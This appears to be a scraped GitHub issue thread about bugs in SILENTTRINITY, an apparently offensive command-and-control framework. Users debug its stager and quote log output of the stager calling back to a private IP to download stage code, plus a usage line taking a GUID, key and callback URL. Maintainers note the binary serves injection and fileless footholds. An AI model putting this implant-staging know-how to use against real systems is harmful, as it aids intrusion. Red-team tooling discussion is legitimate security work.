Comments (9)
@OscarAkaElvis I'm going to be digging into this in an hour or so after I murder some fools in Borderlands
from silenttrinity.
Quite weird... doing more tests sometimes i receive the stager but in a loop again and again and again very quickly.
from silenttrinity.
Below is the output from powershell stager from latest SILENTTRINITY git pull. I think the problem lies with stage.boo file:
Stage.boo(411,34): BCE0044: Block must be indented.
[] Attempting HTTP POST to https://192.168.1.164/e1cfb3da-9a72-4e72-84c7-25cb4bf53572
[-] Attempt #1
[] Attempting HTTP GET to https://192.168.1.164/e1cfb3da-9a72-4e72-84c7-25cb4bf53572
[-] Attempt #1
[*] Downloaded 569008 bytes
[*] Compiling Stage Code
[-] Error(s) compiling script, this probably means your Boo script has bugs
if you replace that file with the old one, you wont see this problem.
from silenttrinity.
Fixed, this was my bad. Was playing with stuff the other day with the stage.boo file and forgot to remove it from the commit.
Cheers
from silenttrinity.
Is the exe stager supposed to be so painful? There is nowhere an output with the GUID and PSK once I generate the executable. Or am I missing something?
from silenttrinity.
Is the exe stager supposed to be so painful? There is nowhere an output with the GUID and PSK once I generate the executable. Or am I missing something?
stager.exe <guid> <psk> <CallBack_URL>
from silenttrinity.
Is the exe stager supposed to be so painful? There is nowhere an output with the GUID and PSK once I generate the executable. Or am I missing something?
stager.exe <guid> <psk> <CallBack_URL>
Thanks, but I mean the guid and psk has to be pulled off the database, I don't see any output when i generate the stager
from silenttrinity.
Is the exe stager supposed to be so painful? There is nowhere an output with the GUID and PSK once I generate the executable. Or am I missing something?
stager.exe <guid> <psk> <CallBack_URL>
Thanks, but I mean the guid and psk has to be pulled off the database, I don't see any output when i generate the stager
I've added a 'getpsk' feature that allows you to do this inside the CLI in a pull that hasn't been accepted yet (here). The binary is mainly used for injection and I think the assumption is you'd be going for more of a 'fileless' attack for a foothold. However, I'm not 100% sure of why the psk isn't disclosed when 'generating' the exe stager. Thinking about it now, there should probably be an option to 'generate' a vanilla binary and one with the guid/psk/CB_urls embedded in it (so there is no need to supply command line arguments) along with the option to use an already generated guid/psk or a new pair.
BTW, currently nothing really happens when it's 'generated'. It's just a copy of what is in the /data folder.
from silenttrinity.
Is the exe stager supposed to be so painful? There is nowhere an output with the GUID and PSK once I generate the executable. Or am I missing something?
stager.exe <guid> <psk> <CallBack_URL>
Thanks, but I mean the guid and psk has to be pulled off the database, I don't see any output when i generate the stager
I've added a 'getpsk' feature that allows you to do this inside the CLI in a pull that hasn't been accepted yet (here). The binary is mainly used for injection and I think the assumption is you'd be going for more of a 'fileless' attack for a foothold. However, I'm not 100% sure of why the psk isn't disclosed when 'generating' the exe stager. Thinking about it now, there should probably be an option to 'generate' a vanilla binary and one with the guid/psk/CB_urls embedded in it (so there is no need to supply command line arguments) along with the option to use an already generated guid/psk or a new pair.
BTW, currently nothing really happens when it's 'generated'. It's just a copy of what is in the /data folder.
Gotcha. I was in fact thinking of a binary where GUID/PSK/IP are already present. Thanks for clarifying.
from silenttrinity.
Related Issues (20)
- [Feature Request] Linked Docker Hub builds HOT 1
- Sessions do not appear on client HOT 1
- Update Install Documentation HOT 1
- [BUG] 'PromptSession' object has no attribute 'prompt_async' HOT 3
- Cannot use staged payloads (only stageless) [BUG] HOT 5
- upload.py: module 'module' has no attribute 'STModule' HOT 2
- [BUG] Unable to perform http POST request using exe stager HOT 5
- Could not find a version that satisfies the requirement Hypercorn==0.9.0
- [BUG] env -S not supported on Ubuntu 18.04 HOT 1
- Boo casting exception when executing modules HOT 5
- [FEATURE REQUEST] Implicitly set rhost value in stagers
- [enhancement] Implicitly set rhost value for stargers HOT 1
- [BUG] Unhandled exception in event loop HOT 1
- [BUG]
- [BUG] Not able to run st.py HOT 1
- Stagers never complete. HOT 3
- [BUG]Multi Operator Setup
- [BUG] Silenttrinity Client strait lines not showing up HOT 1
- [BUG] Client crashes after using any command HOT 1
- Got error while using boo/inject
Recommend Projects
-
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
-
Vue.js
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
-
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
-
TensorFlow
An Open Source Machine Learning Framework for Everyone
-
Django
The Web framework for perfectionists with deadlines.
-
Laravel
A PHP framework for web artisans
-
D3
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
-
Recommend Topics
-
javascript
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
-
web
Some thing interesting about web. New door for the world.
-
server
A server is a program made to process requests and deliver data to clients.
-
Machine learning
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
-
Visualization
Some thing interesting about visualization, use data art
-
Game
Some thing interesting about game, make everyone happy.
Recommend Org
-
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
-
Microsoft
Open source projects and samples from Microsoft.
-
Google
Google ❤️ Open Source for everyone.
-
Alibaba
Alibaba Open Source for everyone
-
D3
Data-Driven Documents codes.
-
Tencent
China tencent open source team.
from silenttrinity.